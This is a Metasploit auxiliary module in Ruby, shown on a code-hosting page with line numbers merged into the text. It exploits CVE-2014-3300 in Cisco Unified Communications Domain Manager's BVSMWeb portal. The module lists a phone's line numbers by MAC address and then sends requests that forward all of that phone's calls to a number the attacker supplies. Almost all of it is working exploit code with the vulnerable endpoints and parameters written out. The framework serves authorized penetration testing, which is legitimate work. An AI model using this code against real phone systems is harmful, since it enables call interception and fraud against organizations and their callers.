Path: blob/master/modules/auxiliary/voip/cisco_cucdm_call_forward.rb
19612 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45require 'rexml/document'67class MetasploitModule < Msf::Auxiliary8include Msf::Exploit::Remote::HttpClient910def initialize(info = {})11super(12update_info(13info,14'Name' => 'Viproy CUCDM IP Phone XML Services - Call Forwarding Tool',15'Description' => %q{16The BVSMWeb portal in the web framework in Cisco Unified Communications Domain Manager17(CDM) 10 does not properly implement access control, which allows remote attackers to18modify user information. This module exploits the vulnerability to configure unauthorized19call forwarding.20},21'Author' => 'fozavci',22'References' => [23['CVE', '2014-3300'],24['BID', '68331']25],26'License' => MSF_LICENSE,27'Actions' => [28[ 'Forward', { 'Description' => 'Enabling the call forwarding for the MAC address' } ],29[ 'Info', { 'Description' => 'Retrieving the call forwarding information for the MAC address' } ]30],31'DefaultAction' => 'Info',32'Notes' => {33'Stability' => [SERVICE_RESOURCE_LOSS],34'SideEffects' => [IOC_IN_LOGS],35'Reliability' => []36}37)38)3940register_options(41[42OptString.new('TARGETURI', [ true, 'Target URI for XML services', '/bvsmweb']),43OptString.new('MAC', [ true, 'MAC address of target phone', '000000000000']),44OptString.new('FORWARDTO', [ true, 'Number to forward all calls', '007']),45OptString.new('FINTNUMBER', [ false, 'FINTNUMBER of IP phones, required for multiple lines'])46]47)48end4950def run51case action.name.upcase52when 'INFO'53get_info54when 'FORWARD'55forward_calls56end57end5859def get_info60uri = normalize_uri(target_uri.to_s)61mac = datastore['MAC']6263print_status('Getting fintnumbers and display names of the IP phone')6465res = send_request_cgi(66{67'uri' => normalize_uri(uri, 'showcallfwd.cgi'),68'method' => 'GET',69'vars_get' => {70'device' => "SEP#{mac}"71}72}73)7475unless res && res.code == 200 && res.body && res.body.to_s =~ /fintnumber/76print_error('Target appears not vulnerable!')77print_status(res.to_s)78return []79end8081doc = REXML::Document.new(res.body)82lines = []83fint_numbers = []8485list = doc.root.get_elements('MenuItem')8687list.each do |lst|88xlist = lst.get_elements('Name')89xlist.each { |l| lines << (l[0]).to_s }90xlist = lst.get_elements('URL')91xlist.each { |l| fint_numbers << (l[0].to_s.split('fintnumber=')[1]).to_s }92end9394lines.size.times do |i|95print_status("Display Name: #{lines[i]}, Fintnumber: #{fint_numbers[i]}")96end9798fint_numbers99end100101def forward_calls102# for a specific FINTNUMBER redirection103uri = normalize_uri(target_uri.to_s)104forward_to = datastore['FORWARDTO']105mac = datastore['MAC']106107if datastore['FINTNUMBER']108fint_numbers = [datastore['FINTNUMBER']]109else110fint_numbers = get_info111end112113if fint_numbers.empty?114print_error('FINTNUMBER required to forward calls')115return116end117118fint_numbers.each do |fintnumber|119print_status("Sending call forward request for #{fintnumber}")120121send_request_cgi(122{123'uri' => normalize_uri(uri, 'phonecallfwd.cgi'),124'method' => 'GET',125'vars_get' => {126'cfoption' => 'CallForwardAll',127'device' => "SEP#{mac}",128'ProviderName' => 'NULL',129'fintnumber' => fintnumber.to_s,130'telno1' => forward_to.to_s131}132}133)134135res = send_request_cgi(136{137'uri' => normalize_uri(uri, 'showcallfwdperline.cgi'),138'method' => 'GET',139'vars_get' => {140'device' => "SEP#{mac}",141'fintnumber' => fintnumber.to_s142}143}144)145146if res && res.body.to_s.include?('CFA')147print_good("Call forwarded successfully for #{fintnumber}")148else149print_error('Call forward failed')150end151end152end153end154155156